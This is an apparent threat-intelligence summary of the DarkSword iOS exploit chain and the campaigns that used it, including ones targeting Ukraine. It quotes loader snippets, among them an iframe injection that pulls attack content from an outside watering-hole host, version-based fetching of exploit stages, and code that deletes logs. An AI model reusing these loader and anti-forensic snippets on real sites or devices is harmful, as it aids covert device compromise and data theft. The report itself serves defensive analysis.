Google Threat Intelligence Group has uncovered a new full-chain iOS exploit named DarkSword. It combines multiple zero-day vulnerabilities to achieve full device compromise, from browser entry point to kernel-level access. The exploit is already being used by multiple actors, including campaigns targeting Ukraine.
DarkSword targets iOS 18.4–18.7 and chains six vulnerabilities to fully compromise a device. After infection, one of three payloads is deployed: GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER.
The attack begins with a malicious webpage, often disguised as a legitimate service like Snapchat. JavaScript checks the device and triggers the next stage:
if (!sessionStorage.getItem("uid") && isTouchScreen) {
sessionStorage.setItem("uid", '1');
const frame = document.createElement("iframe");
frame.src = "frame.html?" + Math.random();
document.body.appendChild(frame);
}
This initiates the exploit chain.
The loader then fetches exploit stages:
function getJS(fname) {
let xhr = new XMLHttpRequest();
xhr.open("GET", fname, false);
xhr.send(null);
return xhr.responseText;
}
It dynamically selects the correct exploit:
if(ios_version == '18,7')
workerCode = getJS(`rce_worker_18.7.js`);
else
workerCode = getJS(`rce_worker_18.6.js`);
More advanced actors use encryption:
const keyPair = generateKeyPair();
const encrypted = self.btoa(exportPublicKeyAsPem(keyPair.publicKey));
After RCE via JavaScriptCore, the exploit escapes the sandbox, pivots through system processes, and escalates privileges to kernel level.
The final payload operates stealthily, removing logs:
if(file.includes("SpringBoard") || file.includes("WebKit")){
deleteFileAtPath(file);
}
In Ukraine-focused campaigns, UNC6353 used watering hole attacks:
const iframe = document.createElement("iframe");
iframe.src = "https://static.cdncounter.net/assets/index.html";
document.body.appendChild(iframe);
A Russian comment in the code suggests attribution:
“// если uid всё ещё нужен — просто устанавливаем”
Payloads then exfiltrate messages, contacts, browser data, Wi-Fi credentials, location data, files, and more. Advanced modules enable audio recording and command execution.
DarkSword follows previous exploit kits like Coruna but demonstrates a new trend: rapid proliferation across multiple actors, indicating a growing commercial exploit ecosystem. DarkSword highlights the increasing accessibility of advanced mobile exploits.
High-end attack chains are no longer exclusive and are now widely reused. Updating iOS, enabling Lockdown Mode, and avoiding suspicious links remain critical defenses.
